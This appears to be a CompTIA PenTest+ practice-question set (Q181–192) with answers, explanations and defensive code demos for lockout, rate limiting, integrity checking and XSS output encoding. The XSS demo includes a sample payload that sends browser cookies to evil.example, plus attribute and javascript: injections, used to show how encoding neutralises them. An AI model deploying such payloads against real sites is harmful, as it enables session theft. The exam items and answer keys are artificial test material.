CompTIA PenTest+ PT0-003 Exam Dumps and Practice Test Questions Set 10 Q181-200
Question 181:
A penetration tester finds that a company’s VPN allows unlimited failed login attempts before locking out. Which type of attack is most likely to succeed against this configuration?
A) Password spraying
B) Phishing
C) SQL injection
D) Cross-site scripting
Answer: A) Password spraying
Explanation:
Password spraying tries a small set of likely passwords (seasonal patterns such as "Winter2024!", leaked or default passwords, organizational conventions) against many accounts, rather than every possible password against one account. It is built to stay below per-account lockout thresholds and the detection rules that fire on repeated failures for a single user. A VPN with no lockout at all places no limit on online guessing, so any credential-guessing attack is feasible against it; of the four options, password spraying is the only one that guesses credentials, which makes it the answer. Mitigations are multi-factor authentication (MFA), a lockout or progressive-delay threshold, a password policy that bans common patterns and known-breached passwords, monitoring of authentication attempts, and anomaly detection that looks across accounts rather than at one account at a time.
Phishing is a social engineering technique that attempts to trick users into disclosing credentials or sensitive information. While phishing can successfully compromise accounts, it does not exploit the configuration of unlimited login attempts directly. Phishing relies on human error rather than automated credential testing.
SQL injection is a technical attack that manipulates backend database queries through unvalidated input. SQL injection targets data storage and retrieval systems and is unrelated to password attempts on authentication interfaces like VPNs. It does not exploit unlimited login attempts.
Cross-site scripting (XSS) injects malicious scripts into web applications to execute in client browsers. XSS attacks target client-side vulnerabilities and user sessions rather than authentication systems. It is unrelated to password-based attacks on VPN systems.
Unlimited failed login attempts leave credential-based attacks unconstrained: an attacker can cycle common passwords across every known account, or hammer one account, for as long as it takes. Two practical caveats matter for the fix. A per-account lockout threshold on its own does not stop spraying, because each account sees only one or two failures; detection must aggregate failures across accounts and source addresses. And a lockout threshold that is too aggressive becomes a denial-of-service lever, since an attacker who knows the usernames can lock everyone out. Layered controls, namely MFA, lockout or rate limiting tuned to the environment, cross-account monitoring and alerting, and a password policy that removes the predictable passwords spraying relies on, address the risk this configuration presents.
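The following is an added example, not part of the original question set: a minimal per-account lockout policy of the kind the scenario's VPN lacks, simulated against a brute-force stream (many guesses at one account) and a password-spray stream (one common password across many accounts). The policy shows why lockout stops the first but not the second. All account names, passwords, addresses and timings are constructed for illustration; the AuthGate class is hypothetical and not any vendor's implementation.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass
class LockoutPolicy:
    threshold: Optional[int]   # failures before lockout; None = unlimited attempts (the scenario's VPN)
    window: float = 900.0      # seconds over which failures are counted
    lockout: float = 900.0     # seconds the account stays locked


class AuthGate:
    """Hypothetical VPN login front end enforcing a per-account lockout policy."""

    def __init__(self, policy, credentials):
        self.policy = policy
        self.credentials = credentials        # constructed user -> password map
        self.failures = defaultdict(list)     # user -> timestamps of recent failures
        self.locked_until = {}                # user -> time at which the lock expires

    def attempt(self, user, password, now):
        """Returns 'locked', 'success' or 'failure' for one login attempt at time `now`."""
        if self.locked_until.get(user, 0.0) > now:
            return "locked"
        if self.credentials.get(user) == password:
            self.failures[user].clear()
            return "success"
        recent = [t for t in self.failures[user] if now - t <= self.policy.window]
        recent.append(now)
        self.failures[user] = recent
        if self.policy.threshold is not None and len(recent) >= self.policy.threshold:
            self.locked_until[user] = now + self.policy.lockout
        return "failure"


# Constructed accounts; one of them uses a guessable seasonal password.
CREDENTIALS = {"alice": "Winter2024!", "bob": "x7#Qp!9vLm2z", "carol": "Tq4$wE8rY1u!"}

# Brute force: 50 wrong guesses against one account, then the right one.
BRUTE_FORCE = [("alice", f"guess{i}") for i in range(50)] + [("alice", "Winter2024!")]

# Password spray: one common password tried once against 23 accounts.
SPRAY = [(u, "Winter2024!") for u in list(CREDENTIALS) + [f"user{i:02d}" for i in range(20)]]


def run(policy, attempts):
    """Feed an attempt stream (one attempt per second) through the gate; count outcomes."""
    gate = AuthGate(policy, CREDENTIALS)
    outcomes = defaultdict(int)
    for second, (user, password) in enumerate(attempts):
        outcomes[gate.attempt(user, password, now=float(second))] += 1
    return dict(outcomes)


if __name__ == "__main__":
    for label, policy in [("no lockout", LockoutPolicy(None)), ("lock after 5", LockoutPolicy(5))]:
        print(label, "brute force:", run(policy, BRUTE_FORCE), "spray:", run(policy, SPRAY))
```

With no lockout the brute-force stream reaches the correct password after 50 failures; with a threshold of 5 the account locks and the remaining 46 attempts, including the correct guess, are rejected as locked. The spray stream compromises alice under both policies, because no account ever accumulates more than one failure. That is the gap cross-account monitoring has to close.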
Question 182:
Which attack exploits weaknesses in user input validation to manipulate backend database queries?
A) SQL injection
B) Cross-site scripting (XSS)
C) Password spraying
D) Denial of Service (DoS)
Answer: A) SQL injection
Explanation:
SQL injection targets backend databases through input that is concatenated into SQL statements without parameterization. The attacker supplies input containing quote characters, comment sequences, or SQL keywords that change the structure of the query instead of being compared as data. Depending on the database platform and the privileges of the application's database account, this can extract sensitive data, modify or delete records, bypass authentication, or, on some platforms, run operating-system commands through database features. Attackers routinely automate discovery with tools that probe every input field and parameter. Applications that build dynamic SQL from user input are the ones at risk: prepared statements with bound parameters remove the risk for values, while stored procedures help only when they do not themselves assemble dynamic SQL from their arguments. Preventive measures include parameterized queries, input validation, allow-lists for identifiers that cannot be parameterized (table and column names, sort order), least-privilege database accounts, web application firewalls (WAFs) as defense in depth, code review, and penetration testing. Monitoring for unusual query patterns, database errors, or excessive access to sensitive tables helps detect attempts.
Cross-site scripting (XSS) targets client-side scripts rather than backend databases. XSS exploits web application vulnerabilities to execute malicious code in users’ browsers, steal sessions, or manipulate web content. It does not directly affect database queries or data integrity.
Password spraying attacks attempt commonly used passwords across multiple accounts. They target authentication systems rather than database vulnerabilities. Password spraying is unrelated to input validation issues and SQL query manipulation.
Denial of Service (DoS) attacks overwhelm system or network resources to make services unavailable. DoS affects availability rather than data integrity or query manipulation, making it unrelated to SQL injection.
SQL injection shows why secure coding, input handling, and database access control belong together. Developers should never concatenate user input into SQL statements; parameterized queries should be the default, and the database account should be limited to the tables and operations the application needs so that a successful injection yields as little as possible. Regular assessments, automated scanning, and penetration testing find injection points before attackers do. Combined with monitoring and an incident response plan, these controls reduce the risk of data breaches, operational disruption, and unauthorized access to sensitive information.
Question 183:
Which type of attack sends massive amounts of traffic to overwhelm a target system?
A) Denial of Service (DoS)
B) Password spraying
C) Cross-site scripting (XSS)
D) Phishing
Answer: A) Denial of Service (DoS)
Explanation:
A Denial of Service (DoS) attack floods a system with excessive traffic or resource requests so that it cannot serve legitimate users; when the traffic comes from many sources it is a distributed denial of service (DDoS). The exhausted resource may be bandwidth, server CPU or memory, connection state, or an application limit. A SYN flood, for example, fills the server's table of half-open TCP connections rather than saturating its link, which is why SYN cookies are a standard countermeasure. Other common techniques are UDP floods, HTTP request floods, and amplification attacks, in which small spoofed requests are bounced off third-party servers to produce much larger responses aimed at the victim. Mitigations include rate limiting, firewalls and traffic filtering, load balancing and redundancy, cloud-based DDoS scrubbing, and network segmentation. Baselining normal traffic, monitoring for deviations, and rehearsed incident response plans shorten the time to react.
Password spraying attacks target multiple accounts with a few common passwords to avoid detection. Password spraying focuses on authentication, not overwhelming system resources, making it unrelated to DoS attacks.
Cross-site scripting (XSS) exploits client-side code vulnerabilities to execute malicious scripts in browsers. XSS attacks manipulate user interaction rather than system resource availability, making it unrelated to DoS.
Phishing is a social engineering attack that tricks users into revealing sensitive information. Phishing targets human behavior rather than system capacity or availability, and therefore is not a DoS method.
DoS attacks highlight the importance of availability in the cybersecurity triad alongside confidentiality and integrity. Attackers may use DoS to distract security teams while performing other attacks, or simply to cause operational disruption. Mitigation strategies involve combining network monitoring, traffic filtering, redundancy, and cloud-based solutions. DoS attacks demonstrate how overwhelming system resources can disrupt business operations and create vulnerabilities that could be exploited further. Understanding attack vectors, implementing proactive defenses, and maintaining incident response plans are essential for minimizing impact and maintaining service continuity.
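As an added example, not from the original question set, the following implements the per-source rate limiting named above as a mitigation: a token bucket per client address, of the kind a reverse proxy or firewall applies in front of an HTTP service, run against a constructed timeline containing one legitimate client and one flooding source. The traffic, addresses and rate parameters are constructed; the limiter is a generic illustration, not any product's implementation.

```python
from collections import defaultdict


class TokenBucket:
    """Classic token bucket: `rate` tokens per second refill, at most `burst` stored."""

    def __init__(self, rate, burst):
        self.rate = rate
        self.burst = burst
        self.tokens = float(burst)
        self.last = 0.0

    def allow(self, now):
        # Refill for the time elapsed since the last request, capped at the burst size,
        # then spend one token if one is available.
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


class PerSourceLimiter:
    """One bucket per source address; new sources start with a full bucket."""

    def __init__(self, rate=5.0, burst=10):
        self.rate, self.burst = rate, burst
        self.buckets = {}

    def allow(self, src, now):
        bucket = self.buckets.get(src)
        if bucket is None:
            bucket = TokenBucket(self.rate, self.burst)
            bucket.last = now
            self.buckets[src] = bucket
        return bucket.allow(now)


def simulate(requests, rate=5.0, burst=10):
    """requests: iterable of (timestamp_seconds, source). Returns {source: (allowed, dropped)}."""
    limiter = PerSourceLimiter(rate, burst)
    stats = defaultdict(lambda: [0, 0])
    for ts, src in sorted(requests):
        stats[src][0 if limiter.allow(src, ts) else 1] += 1
    return {src: tuple(counts) for src, counts in stats.items()}


# Constructed traffic: a legitimate client at 2 requests/s for 10 s ...
LEGIT = [(i * 0.5, "203.0.113.7") for i in range(20)]
# ... and a flooder at 100 requests/s for the same 10 s.
FLOOD = [(i * 0.01, "198.51.100.9") for i in range(1000)]


if __name__ == "__main__":
    print(simulate(LEGIT + FLOOD))
```

The legitimate client never exceeds its refill rate and is never dropped; the flooder gets its 10-request burst plus roughly 5 requests per second thereafter (about 60 of its 1,000 requests) and the rest are rejected. Per-source limiting is only a first layer: a distributed flood spreads its load across thousands of sources that each stay under the limit, and spoofed SYN floods have no stable source at all, which is why upstream scrubbing and SYN cookies sit alongside it.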
Question 184:
Which malware hides within the operating system to maintain long-term access?
A) Rootkit
B) Trojan horse
C) Adware
D) Ransomware
Answer: A) Rootkit
Explanation:
A rootkit is malware designed to conceal its own presence, and often that of other malware, processes, files, or network connections, while preserving privileged, persistent access for the attacker. Rootkits run in user mode, in the kernel, or below the operating system in the bootloader or firmware (bootkits). A kernel-mode rootkit can hook the very system calls that on-host antivirus, process listers, and file browsers rely on, so it can simply filter itself out of their results. Detection therefore relies on specialized tools, scanning from trusted offline media, cross-view comparisons (for example, the process list reported by the OS against one obtained by an independent method), file and memory integrity checks, and behavioral monitoring. Rootkits arrive via Trojan horses, malicious downloads, phishing, or exploitation of vulnerabilities, and once installed can steal credentials, exfiltrate data, or provide remote access for long periods without the user's knowledge. Mitigations include least privilege (installing a kernel rootkit requires administrative access), patch management, Secure Boot and measured boot, integrity monitoring, and endpoint detection and response (EDR).
Trojan horses are deceptive programs that appear legitimate to deliver malicious payloads. While Trojans may install rootkits, they are primarily characterized by deception rather than stealthy persistence within the OS.
Adware delivers advertisements and tracks user behavior to generate revenue. Adware does not maintain hidden control over systems or provide deep access, unlike rootkits.
Ransomware encrypts files and demands payment for decryption. Ransomware is overt and extortion-based, rather than stealth-focused like rootkits.
Rootkits are particularly dangerous due to their ability to evade detection, maintain long-term control, and facilitate further attacks. They highlight the importance of secure development, endpoint monitoring, and proactive system audits. By understanding rootkit behavior and implementing layered defenses, organizations can reduce exposure, detect anomalous activities, and protect sensitive data. Rootkits demonstrate how attackers exploit both technical and system-level vulnerabilities to maintain persistent unauthorized access, emphasizing the need for vigilance, monitoring, and strong security practices.
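The integrity check mentioned above, as an added example that is not part of the original question set: a minimal file-integrity baseline of the kind used to catch a rootkit replacing system binaries. It hashes a set of files into a baseline and later reports anything added, removed, or modified. The "filesystem" is a constructed dict of path to bytes, and the tampering shown (a trojanized ps and a dropped kernel module) is invented for illustration. The caveat from the text applies: a kernel rootkit can feed the checker the clean bytes, so the check should run from trusted media and the baseline must be stored off-host.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(files):
    """files: {path: content bytes}. Returns {path: sha256 hex digest}, to be kept off-host."""
    return {path: sha256_hex(content) for path, content in files.items()}


def verify(files, baseline):
    """Compare the current file set against a stored baseline."""
    current = build_baseline(files)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


# Constructed "filesystem": a clean host imaged right after installation.
CLEAN_HOST = {
    "/bin/ls": b"\x7fELF...ls-v1",
    "/bin/ps": b"\x7fELF...ps-v1",
    "/lib/libc.so.6": b"\x7fELF...libc-v1",
}

# Constructed: the same host after a user-mode rootkit replaced ps with a
# version that hides its own process and dropped a kernel module.
TAMPERED_HOST = dict(CLEAN_HOST)
TAMPERED_HOST["/bin/ps"] = b"\x7fELF...ps-v1-hides-pid-4242"
TAMPERED_HOST["/lib/modules/hide.ko"] = b"\x7fELF...kernel-module"

BASELINE = build_baseline(CLEAN_HOST)

if __name__ == "__main__":
    print(verify(TAMPERED_HOST, BASELINE))
```

Running it reports /bin/ps as modified and /lib/modules/hide.ko as added. Production tools (AIDE, Tripwire, OS-native measured-boot attestation) add signed baselines, metadata such as permissions and owners, and scheduled runs, but the comparison is the same.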
Question 185:
Which attack attempts to trick users into revealing credentials or personal information through deceptive communication?
A) Phishing
B) SQL injection
C) Brute force attack
D) Denial of Service (DoS)
Answer: A) Phishing
Explanation:
Phishing is a social engineering attack that manipulates users into disclosing sensitive information, such as usernames, passwords, credit card numbers, or personal data. Phishing typically involves impersonating trusted entities through email, messaging, or fraudulent websites. Attackers may use urgency, fear, or incentives to prompt victims to act quickly without verifying legitimacy. Variants include spear phishing, which targets specific individuals or roles, whaling aimed at executives, and clone phishing, where legitimate communications are duplicated with malicious intent. Phishing attacks exploit human behavior rather than technical vulnerabilities, making user education, awareness, and vigilance essential components of defense. Organizations deploy email filtering, anti-malware tools, multi-factor authentication (MFA), URL scanning, and monitoring suspicious activity to mitigate phishing risks. Regular training and simulated phishing campaigns help users recognize suspicious communications and avoid credential compromise.
SQL injection manipulates backend database queries through unvalidated input. SQL injection targets server-side systems and databases, not user behavior.
Brute force attacks systematically attempt every possible password for a single account until successful. While brute force targets authentication, it is a technical attack, unlike phishing, which targets the human element.
Denial of Service (DoS) attacks flood resources to make services unavailable. DoS attacks target system availability rather than deceiving users to reveal sensitive information.
Phishing remains one of the most effective and widely used attack methods because it exploits trust, fear, and urgency. Organizations strengthen defenses by combining technical controls like MFA and monitoring with user education and incident response strategies. By simulating phishing attacks and analyzing behavior, organizations can measure effectiveness and improve user awareness. Phishing highlights the need to integrate technology, policy, and human vigilance to reduce successful attacks and protect sensitive information.
Question 186:
Which type of attack manipulates web application input to execute malicious scripts in users’ browsers?
A) Cross-site scripting (XSS)
B) SQL injection
C) Brute force attack
D) Denial of Service (DoS)
Answer: A) Cross-site scripting (XSS)
Explanation:
Cross-site scripting (XSS) injects attacker-controlled script into a web page so that it runs in the browsers of other users of the application. The root cause is untrusted data (form fields, URL parameters, comments, profile fields) being written into HTML, attribute values, or JavaScript without output encoding appropriate to that context; input validation helps but cannot cover every place the data is later rendered. A successful payload runs with the page's origin and can read session cookies not marked HttpOnly, make requests as the victim, capture keystrokes, deface content, or redirect to malicious sites. XSS is a client-side attack: the server is the delivery vehicle and the user is the victim. The three main types are stored (the payload is saved on the server, for example in a comment, and served to everyone who views it), reflected (the payload is embedded in a URL or form submission and echoed straight back in the response, so the victim must be lured into following a crafted link), and DOM-based (client-side JavaScript itself writes attacker-controlled data, such as location.hash, into the page, so the payload may never reach the server and server-side defenses never see it).
SQL injection targets backend database queries by injecting malicious SQL commands. SQL injection is a server-side attack designed to manipulate data in the database rather than affecting client-side scripts, making it distinct from XSS.
Brute force attacks attempt to guess passwords systematically for single accounts. Brute force is an authentication attack and does not involve client-side script execution or web application input manipulation.
Denial of Service (DoS) attacks overwhelm systems with excessive traffic or requests, aiming to degrade availability. DoS focuses on resource exhaustion and operational disruption rather than exploiting user-facing web input.
XSS is dangerous because the script runs as the victim inside the application: it can hijack sessions, steal data, perform actions on the user's behalf, deliver malware, or alter page content without the user noticing. Defenses are context-aware output encoding as the primary control, input validation, a Content Security Policy (CSP) that restricts where scripts may load from and blocks inline script, HttpOnly and SameSite cookie attributes to limit what a payload can reach, web application firewalls (WAFs) as defense in depth, secure code review, and testing before deployment. For DOM-based XSS the client-side code itself must use safe DOM APIs (textContent rather than innerHTML) for untrusted data. Mitigating XSS protects user data, preserves application integrity, and keeps the browser from being turned against the user.
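The same untrusted comment rendered unsafely and safely, as an added example that is not from the original question set. It shows the point made above: each value must be encoded for the context it lands in (element body, attribute value, URL attribute), which is why output encoding rather than input validation is the primary control. The page template and the three attacker inputs are constructed; only the standard-library html and urllib.parse modules are used.

```python
import html
from urllib.parse import quote

# Constructed attacker inputs for three rendering contexts.
PAYLOAD_BODY = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
PAYLOAD_ATTR = '" onmouseover="alert(1)'   # closes the quoted attribute, adds an event handler
PAYLOAD_URL = "javascript:alert(1)"        # dangerous scheme in an href


def render_unsafe(name, comment, homepage):
    # VULNERABLE: untrusted values concatenated straight into the markup.
    # Stored XSS if `comment` came from the database, reflected if it came from the request.
    return (f'<div class="comment" data-author="{name}">'
            f'<a href="{homepage}">{name}</a>: {comment}</div>')


def safe_url(url):
    # URL context: allow only http(s) links; anything else becomes an inert anchor.
    return url if url.lower().startswith(("http://", "https://")) else "#"


def render_safe(name, comment, homepage):
    # Each value is encoded for the context it lands in:
    #   element body and attribute values -> html.escape(quote=True) encodes & < > " '
    #   URL attribute -> scheme allow-list, percent-encoding, then HTML attribute encoding
    name_esc = html.escape(name, quote=True)
    comment_esc = html.escape(comment, quote=True)
    href = html.escape(quote(safe_url(homepage), safe=":/?#&=%~"), quote=True)
    return (f'<div class="comment" data-author="{name_esc}">'
            f'<a href="{href}">{name_esc}</a>: {comment_esc}</div>')


def contains_active_markup(rendered):
    """Crude oracle: does the output still contain a script tag, an injected handler, or a javascript: link?"""
    low = rendered.lower()
    return "<script" in low or ' onmouseover="' in low or 'href="javascript:' in low


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD_ATTR, PAYLOAD_BODY, PAYLOAD_URL))
    print(render_safe(PAYLOAD_ATTR, PAYLOAD_BODY, PAYLOAD_URL))
```

In the safe output the script tag becomes `&lt;script&gt;`, the injected attribute stays inside the quoted `data-author` value as `&quot; onmouseover=&quot;`, and the `javascript:` link is replaced by `#`. A CSP that disallows inline script would block the first payload even if the encoding were missed, which is the defense-in-depth argument for deploying both.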
Question 187:
Which authentication factor is based on a unique physical or behavioral trait of the user?
A) Biometric authentication
B) Knowledge-based authentication
C) Possession-based authentication
D) Certificate-based authentication
Answer: A) Biometric authentication
Explanation:
Biometric authentication verifies identity using a physical or behavioral characteristic of the user: fingerprints, facial geometry, iris patterns, voice, or behavioral traits such as typing rhythm. It is the "something you are" factor. Biometrics are convenient and hard to share or forget, but they are not secrets: fingerprints and faces can be captured and reproduced, so a sensor without liveness (presentation attack) detection can be spoofed, and unlike a password a compromised biometric cannot be changed. Matching is also probabilistic, so every system has a false acceptance rate (FAR) and a false rejection rate (FRR) that move in opposite directions as the decision threshold changes. For these reasons biometrics are usually one factor in multi-factor authentication (MFA), combined with something the user knows (password) or has (token or device). Secure deployments protect stored templates (ideally on the device in a secure enclave rather than in a central database), encrypt data in transit, implement liveness detection, and respect privacy requirements for this sensitive personal data.
Knowledge-based authentication relies on information the user knows, such as passwords or PINs. While knowledge-based factors are easy to implement and widely used, they are vulnerable to phishing, credential theft, and reuse. They are not intrinsic to the user and can be compromised without physical presence or behavioral verification.
Possession-based authentication relies on items the user has, such as security tokens, smart cards, or mobile devices. Possession factors verify ownership, not inherent user traits. They can be lost or stolen and require supplemental security measures.
Certificate-based authentication proves control of the private key that corresponds to a certificate issued by a trusted certificate authority. It is a possession factor (the key, typically held on a smart card, hardware token, or device), not a human trait.
Biometric authentication strengthens identity verification by tying access control directly to unique physical or behavioral attributes. It reduces reliance on passwords and tokens, which may be stolen, guessed, or shared. Organizations integrate biometrics with other authentication factors to improve security while maintaining user convenience. Biometric systems must address false acceptance rates, false rejection rates, template security, and privacy concerns. With proper implementation, biometrics enhance access control, deter unauthorized access, and provide a reliable method for identity verification in corporate, government, and mobile environments. By combining technical, procedural, and behavioral controls, organizations can leverage biometric authentication to secure sensitive systems while providing a seamless user experience.
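As an added example that is not part of the original question set, the following computes the false acceptance rate (FAR) and false rejection rate (FRR) discussed above from constructed matcher scores and sweeps the decision threshold, showing the trade-off an operator makes when tuning a biometric system. The scores are synthetic and do not come from any product; a real evaluation uses thousands of genuine and impostor comparisons.

```python
# Constructed matcher scores in [0, 1]; higher means "more similar".
GENUINE = [0.91, 0.88, 0.95, 0.79, 0.85, 0.93, 0.72, 0.89, 0.96, 0.83]   # user vs own template
IMPOSTOR = [0.31, 0.44, 0.52, 0.67, 0.28, 0.73, 0.39, 0.58, 0.61, 0.47]  # other users vs that template


def far(threshold, impostor=IMPOSTOR):
    """False acceptance rate: share of impostor comparisons scoring at or above the threshold."""
    return sum(s >= threshold for s in impostor) / len(impostor)


def frr(threshold, genuine=GENUINE):
    """False rejection rate: share of genuine comparisons scoring below the threshold."""
    return sum(s < threshold for s in genuine) / len(genuine)


def sweep(step=0.05):
    """(threshold, FAR, FRR) across the score range; FAR falls and FRR rises as the bar goes up."""
    rows = []
    for i in range(int(round(1 / step)) + 1):
        t = round(i * step, 2)
        rows.append((t, far(t), frr(t)))
    return rows


def equal_error_threshold():
    """Threshold (to 0.01) where FAR and FRR are closest; the equal error rate is the value there."""
    candidates = [round(i * 0.01, 2) for i in range(101)]
    return min(candidates, key=lambda t: abs(far(t) - frr(t)))


def threshold_for_far_budget(max_far):
    """Lowest threshold that keeps FAR within budget, and the FRR (user friction) it costs."""
    for i in range(101):
        t = round(i * 0.01, 2)
        if far(t) <= max_far:
            return t, frr(t)
    return None


if __name__ == "__main__":
    for t, a, r in sweep():
        print(f"threshold {t:.2f}  FAR {a:.2f}  FRR {r:.2f}")
    print("EER threshold:", equal_error_threshold())
    print("threshold for FAR <= 0:", threshold_for_far_budget(0.0))
```

On this data FAR and FRR meet at a threshold of 0.73 (both 10%). Demanding zero false acceptances pushes the threshold to 0.74 and still rejects one genuine user in ten, which is the cost a high-security deployment pays and the reason liveness detection and a second factor, rather than an ever-higher threshold, are used to close the remaining gap.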
Question 188:
Which malware encrypts a user’s files and demands payment for decryption?
A) Ransomware
B) Rootkit
C) Adware
D) Trojan horse
Answer: A) Ransomware
Explanation:
Ransomware is malware that encrypts a victim's files, or locks the system, and demands payment, usually in cryptocurrency, for the decryption key. Many current operators also steal data before encrypting and threaten to publish it (double extortion), so restoring from backup alone does not end the incident. Initial access comes through phishing, malicious downloads, exposed remote-access services with weak or reused credentials, or unpatched vulnerabilities, often followed by credential theft and lateral movement before encryption is triggered across the network. The encryption uses strong algorithms, so recovery without the key is generally impossible. Mitigations are backups that are offline or immutable and regularly restore-tested, patch management, MFA on remote access, endpoint protection and EDR, network segmentation, least privilege, and user training. Because ransomware halts operations and causes financial and reputational damage, incident response plans must cover isolating affected systems, preserving evidence, and executing disaster recovery.
Rootkits are malware designed to hide within the operating system to maintain persistent access. Rootkits operate stealthily rather than overtly encrypting files or demanding payment.
Adware delivers unsolicited advertisements and tracks user behavior for monetization. Adware is intrusive but generally non-destructive and does not encrypt files or extort payment.
Trojan horses disguise themselves as legitimate software to deliver malicious payloads. Trojans may deliver ransomware, but they are characterized by deception, not encryption and ransom demands themselves.
Ransomware illustrates the importance of layered defenses combining technical, procedural, and human-centered strategies. Organizations deploy preventive measures, backup strategies, and rapid incident response capabilities to minimize impact. Educating users about phishing and unsafe downloads reduces the likelihood of ransomware infection. Additionally, monitoring endpoints and networks for anomalous file activity helps detect ransomware early. Ransomware remains a prevalent threat due to its direct financial impact, ease of distribution, and ability to disrupt critical operations. Effective mitigation requires ongoing awareness, robust security practices, and comprehensive preparedness to maintain business continuity and protect sensitive data.
Question 189:
Which Microsoft solution helps manage devices, enforce compliance, and control access to company resources?
A) Microsoft Intune
B) Microsoft OneDrive
C) Microsoft Planner
D) Microsoft Defender for Identity
Answer: A) Microsoft Intune
Explanation:
Microsoft Intune is a cloud-based endpoint management service that manages devices and applications and evaluates devices against compliance policies. Administrators can require disk encryption, minimum OS versions, password rules, and application restrictions across company-owned and BYOD (bring your own device) fleets, deploy updates and software, and monitor device health. Intune reports each device's compliance state to Microsoft Entra ID (formerly Azure Active Directory), where Conditional Access policies can require a compliant or managed device before granting access to corporate resources. Intune supports Windows, macOS, iOS, and Android, providing unified endpoint management.
Microsoft OneDrive is a cloud storage and file-sharing platform, focusing on collaboration and data storage. OneDrive does not manage device compliance or enforce security policies.
Microsoft Planner is a task and project management tool, organizing work assignments and workflows. Planner is not designed to manage devices or control access to company resources.
Microsoft Defender for Identity uses sensors on on-premises Active Directory domain controllers to detect suspicious authentication activity, reconnaissance, and lateral movement. It strengthens identity security but does not manage devices or enforce device compliance.
Intune strengthens security by combining device management, application control, and compliance enforcement. It enables conditional access, ensuring only compliant devices can access corporate data. Intune’s integration with other Microsoft security solutions provides centralized monitoring, reporting, and enforcement. Organizations can deploy updates, restrict data access, and respond to policy violations quickly. Intune supports modern workforces by enabling secure mobility while maintaining corporate control, ensuring that devices, applications, and user access adhere to organizational security standards. Effective Intune deployment reduces the risk of data breaches, unauthorized access, and non-compliant devices while facilitating efficient management and secure access for employees across platforms and locations.
Question 190:
Which attack is characterized by attempting multiple password combinations on a single account until the correct one is found?
A) Brute force attack
B) Password spraying
C) Phishing
D) SQL injection
Answer: A) Brute force attack
Explanation:
A brute force attack systematically tries password candidates against a single account until one succeeds: in the extreme every possible combination, more often a dictionary or rule-based list. The rate depends on where the attack runs. Offline attacks against a stolen password hash can test millions or billions of guesses per second, whereas online attacks against a login interface are bounded by the service's response time and any lockout or rate-limiting controls. Brute force is effective against weak, short, or common passwords and is mitigated by account lockout or progressive delays, multi-factor authentication (MFA), rate limiting, and strong password policies (and, for the offline case, slow salted password hashing). A successful attack compromises the account and any data or administrative access behind it. Monitoring failed login attempts per account and per source, with anomaly detection, lets defenders identify and respond to brute force attempts promptly.
Password spraying targets multiple accounts using a few common passwords, avoiding lockouts. Unlike brute force, it does not focus exhaustively on a single account.
Phishing attacks rely on tricking users into revealing credentials or sensitive information through deceptive communication. Phishing is human-centered, not automated password guessing.
SQL injection exploits database query vulnerabilities by injecting malicious input. SQL injection targets data integrity and backend systems rather than account passwords.
Brute force attacks emphasize the need for strong, unique passwords, MFA, monitoring authentication logs, and anomaly detection. Organizations combine technical defenses with user awareness training to reduce the risk of compromise. Brute force attacks illustrate how automated credential guessing threatens access control and highlight the importance of layered security measures that protect sensitive accounts and critical systems. Consistent monitoring and security enforcement are key to mitigating brute force risks and maintaining operational integrity and data protection.
Question 191:
Which Microsoft 365 service provides task and project management capabilities to organize work for teams?
A) Microsoft Planner
B) Microsoft OneDrive
C) Microsoft Intune
D) Microsoft Defender for Identity
Answer: A) Microsoft Planner
Explanation:
Microsoft Planner is a cloud-based task and project management tool integrated with Microsoft 365. Planner allows teams to create, assign, and track tasks across projects while providing visual dashboards, charts, and progress indicators to manage workloads effectively. Users can create buckets for tasks, add due dates, attach files, assign tasks to team members, and track progress with Kanban-style boards. Planner integrates with Microsoft Teams, Outlook, and SharePoint to provide seamless collaboration and centralize task management. Its primary purpose is productivity and organization, enabling teams to plan work, visualize progress, and ensure accountability within a collaborative environment. Planner improves project visibility, reduces communication overhead, and allows for efficient resource allocation.
Microsoft OneDrive focuses on cloud storage and file-sharing capabilities. While OneDrive supports collaboration by storing files, it does not provide task or project management functionality.
Microsoft Intune manages devices, applications, and compliance policies. Intune is focused on securing endpoints and enforcing access control rather than organizing tasks or managing projects.
Microsoft Defender for Identity monitors user activity and authentication events for suspicious behavior and potential account compromise. Defender for Identity enhances security posture but does not provide task or project management features.
Planner emphasizes collaborative work organization through visual task management and integration with productivity tools. Teams can create projects, assign responsibilities, track deadlines, and receive notifications to stay aligned with objectives. Planner also provides reporting capabilities, showing task progress, overdue items, and resource allocation. By leveraging Planner, organizations can improve workflow transparency, enhance accountability, and reduce task duplication. Planner supports real-time updates, ensuring all team members have access to the most current information. It is particularly effective for remote or hybrid teams, enabling distributed collaboration and structured project management. Its integration with other Microsoft 365 applications ensures that tasks, files, and communications are linked, reducing the complexity of managing multiple platforms. Planner demonstrates how task management tools improve operational efficiency and team collaboration while complementing security and storage tools within the Microsoft 365 ecosystem.
Question 192:
Which attack involves sending deceptive communications to manipulate users into performing actions or divulging information?
A) Phishing
B) Brute force attack
C) SQL injection
D) Cross-site scripting (XSS)
Answer: A) Phishing
Explanation:
Phishing is a social engineering attack that deceives users into revealing sensitive information or performing actions beneficial to attackers. It often occurs via email, instant messaging, phone calls, or fraudulent websites that impersonate legitimate entities. Attackers create urgency, fear, or curiosity to prompt users to act quickly, bypassing normal security caution. Variants include spear phishing, which targets specific individuals, whaling aimed at executives, and clone phishing, which duplicates legitimate communications with malicious intent. Phishing is highly effective because it exploits human behavior rather than technical vulnerabilities. Organizations mitigate phishing through multi-factor authentication (MFA), email filtering, web filtering, training, and awareness campaigns. Security teams also conduct simulated phishing exercises to test user readiness and reinforce safe behavior.
Brute force attacks systematically attempt multiple password combinations to compromise accounts. Brute force attacks target authentication systems rather than exploiting user behavior.
SQL injection manipulates database queries through unvalidated input. SQL injection targets backend systems, not human decision-making or behavior.
Cross-site scripting (XSS) injects malicious scripts into client browsers to steal session data or manipulate web content. XSS targets technical vulnerabilities rather than social behavior.
